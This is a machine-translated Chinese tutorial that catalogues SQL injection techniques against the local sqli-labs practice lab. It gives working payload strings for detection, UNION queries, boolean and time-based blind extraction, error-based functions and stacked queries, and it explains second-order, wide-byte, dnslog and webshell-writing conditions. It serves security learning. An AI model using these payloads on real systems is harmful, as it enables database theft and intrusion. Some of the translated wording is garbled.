Catalog

One 、 principle

Two 、SQL Injection judgment method

1. Character type detection

2. Digital detection

3. Search detection and xx Type detection

3、 ... and 、union Inject

1.order by Judging the number of columns

2.union The joint query

Four 、 Blind note

1. Bull's blind note

（1） Query database length

（2） Query the current database name

（3） Query the number of tables under the database

（4） Query the first table name in the database

（5） Query the number of fields in the following table of the database

（6） Judge the length of the first field in the following table of the database

（7） Query the first digit of the first field in the following table of the database

（8） Get the first data of field detection

2. Time blind note

（1） Determine whether there is a delay function

（2） Query the length of the current database , If correct, then delay 5 second

（3） Judge whether the first digit of the current database name is a

（4） Determine the first place of the current database name ascii Is it 100

（5） Number of query tables

（6） Query table name length

（7） Intercept the first place of the table name

（8） Query the number of column fields

（9） Query column name length

（10） Take the first place in the column

（11） Inquire about id Length of the first data

（12） Get the content of data information

5、 ... and 、 An error injection

（1）floor()

（2）extractvalue()

（3）updatexml()

（4）geometrycollection()

（5）multipoint()

（6）polygon()

（7）multipolygon()

（8）linestring()

（9）multilinestring()

（10）exp()

6、 ... and 、 Stack Injection

7、 ... and 、 The secondary injection

（1） Insert malicious data

（2） Quoting malicious data

8、 ... and 、 Wide byte Injection

（1） principle

（2） Conditions

Nine 、dnslog Inject

（1） Conditions

Ten 、 Request header Injection

11、 ... and 、SQL Injection write webshell

Twelve 、 summary

One 、 principle

  So-called SQL Inject , It's through SQL Command insert into Web Submit the form or enter the domain name Or the query string requested by the page , Finally, to cheat the server to execute malicious SQL command
  SQL Syntax allows database commands to be mixed with user data . If Developers are not careful Words , User data may be interpreted as commands ,  In this case , Remote users will not only be able to Web Apply input data , And you can execute any command on the database .

Two 、SQL Injection judgment method

1. Character type detection

Character type judgment url Whether there is injection , stay url Add a Single quotation marks

url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1’

Such an error will be displayed , It roughly means that you have a sql Grammar mistakes , When adding %23 An annotation character will be displayed normally .

When we're in url Enter after the single quotation mark of the column URL and 1=1 Time page According to the normal .

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#

When we put 1=1 Switch to 1=2 when Page error reporting

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#

2. Digital detection

Direct input and 1=1 see .

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1

It's possible to Display the page normally Of , Then we are making a further judgment 1=2 when .

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2

Found that the page has changed , Then we can judge that it is a digital injection , Because digital injection does not need quotation marks . Just Be similar to int equally .

3. Search detection and xx Type detection

This is a kind of character type detection , It just needs to be carried out according to different error information The structure is closed .

3、 ... and 、union Inject

1.order by And error reporting injection

select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

2.union The joint query

?id=111’ union select 1,2,(group_concat(table_name) from information_schema.tables where table_schema=‘ Database name ’) --+

Four 、 Blind note

1. Bull's blind note

（1） Query database length

and (length(database()))>8%23

（2） Query the current database name

and (ascii(substr(database(),1,1)))<120 %23

（3） Query the number of tables under the database

and (select count(*) from information_schema.tables where table_schema=' Database name ')>4 %23

（4） Query the first table name in the database

and  (length((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1)))=6%23

（5） Query the number of fields in the following table of the database

and  (ascii(substr((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1),1,1))>100)%23

（6） Judge the length of the first field in the following table of the database

and  (length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1)))=2%23

（7） Query the first digit of the first field in the following table of the database

and  (ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105 %23

（8） Get the first data of field detection

and (ascii(substr((select  Field name  from  Table name  limit 0,1),1,1)))=68 %23

2. Time blind note

（1） Determine whether there is a delay function

and sleep(5) %23

（2） Query the length of the current database , If correct, then delay 5 second

and if((length(database()))>7,sleep(5),1) --+

（3） Judge whether the first digit of the current database name is a

and if((substr(database(),1,1)='a'),sleep(5),1)  %23

（4） Determine the first place of the current database name ascii Is it 100

and if((ascii(substr(database(),1,1))=100),sleep(5),1)  %23

（5） Number of query tables

and if((select count(*) from information_schema.tables where table_schema=' Database name ')=4,sleep(5),1)%23

（6） Query table name length

and if((select length((select table_name from information_schema.tables where table_schema=' Database name ' limit 3,1))=5),sleep(5),1)%23

（7） Intercept the first place of the table name

and if((select ascii(substr((select table_name from information_schema.tables where table_schema=' Database name  limit 3,1),1,1)))=117,sleep(5),1)%23

（8） Query the number of column fields

and if(((select count(*) from information_schema.columns where table_schema=' Database name ' and table_name='users')=3),sleep(5),1)%23

（9） Query column name length

and if((select length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1))=2),sleep(5),1)%23

（10） Take the first place in the column

and if((select ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105,sleep(5),1)%23

（11） Inquire about id Length of the first data

and if((select length((select id from  Table name   limit 0,1)))=1,sleep(5),1)%23

（12） Get the content of data information

and if((select ascii(substr((select id from  Table name   limit 0,1),1,1)))=49,sleep(5),1)%23

5、 ... and 、 An error injection

（1）floor()

and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

（2）extractvalue()

select * from  Database name  where id=1 and (extractvalue(1,concat(0x7e,(select  Table name ()),0x7e)));

（3）updatexml()

select * from  Database name  where id=1 and (updatexml(1,concat(0x7e,(select  Table name ()),0x7e),1));

（4）geometrycollection()

select * from  Database name where id=1 and geometrycollection((select * from(select * from(select  Table name ())a)b));

（5）multipoint()

select * from  Database name  where id=1 and multipoint((select * from(select * from(select  Table name ())a)b));

（6）polygon()

select * from  Database name  where id=1 and polygon((select * from(select * from(select  Table name ())a)b));

（7）multipolygon()

select * from  Database name  where id=1 and multipolygon((select * from(select * from(select  Table name ())a)b));

（8）linestring()

select * from  Database name  where id=1 and linestring((select * from(select * from(select  Table name ())a)b));

（9）multilinestring()

select * from  Database name  where id=1 and multilinestring((select * from(select * from(select  Table name ())a)b));

（10）exp()

select *  Database name  test where id=1 and exp(~(select * from(select  Table name ())a));

6、 ... and 、 Stack Injection

principle ： The principle of Stack Injection :  mysql_multi_query() Support multiple sql Statements execute simultaneously , That's it. ; Separate , Piles of execution sql sentence

for example

select * from users;show databases;

Just execute the above two commands at the same time , So we can add, delete, modify and check , As long as the authority is enough
Although this injection posture is very awesome , But in reality, there are few , It may be affected by API Or database engine , Or the restriction of permission can only be implemented when calling database functions sql Statement , utilize mysqli_multi_query() Function supports multiple sql Statements execute simultaneously , But in reality , Such as PHP In order to prevent sql Injection mechanism , The functions that are often used to call the database are mysqli_ query() function , It can only execute one statement , What follows the semicolon will not be executed , Therefore, it can be said that the use conditions of stack injection are very limited , Once it can be used , It may pose a great threat to the website .

7、 ... and 、 The secondary injection

The secondary injection , It can be summarized as the following two steps :

（1） Insert malicious data

When inserting data into the database , About the Special characters are escaped , stay Write to database At the same time, the original data is retained .

（2） Quoting malicious data

By default, the data stored in the database is safe , When making a query , Directly from the database Extract malicious data , Treatment without further inspection .

8、 ... and 、 Wide byte Injection

（1） principle

When passing a parameter id=1‘ It's time , When we enter this single quotation mark , Would be considered to be Illegal characters , Will be Filter function add “\” Filter out , So we want the program to accept that the parameters we pass contain single quotes , Then you need to put this escape character “\” kill , Then how can we kill it ？ When http When the protocol is transmitted , Is to go through url Coded , If this coding is complete , When delivered to the server , We can precede single quotation marks Add a %81 This has to be coded , Finally, when decoding like this , This %81 And “/” The corresponding codes are combined according to gbk Coding requires decoding , All that's left is a single quote .

（2） Conditions

Ⅰ： The database query is set to GBK code
Ⅱ： Used addslashes(),mysql_real_escape_string(),mysql_escape_string() Functions like that

Nine 、dnslog Inject

（1） Conditions

mysql.ini in secure_file_priv Must be empty
●secure_file_priv by null Import and export are not allowed
●secure_file_priv by /tmp Import and export can only be done in /tmp Under the table of contents
●secure_file_priv It's empty time Import and export are allowed without restrictions

Ten 、SQL Injection write webshell

（1） Conditions

Ⅰ： At present sql The injection user must be DBA jurisdiction （--is-dba by true）

Ⅱ： Need to know the website Absolute path

Ⅲ：My.ini This configuration in the file secure_file_priv=”” It's empty

11、 ... and 、 summary

Summed up a long time of information , I hope all technical friends can finish reading .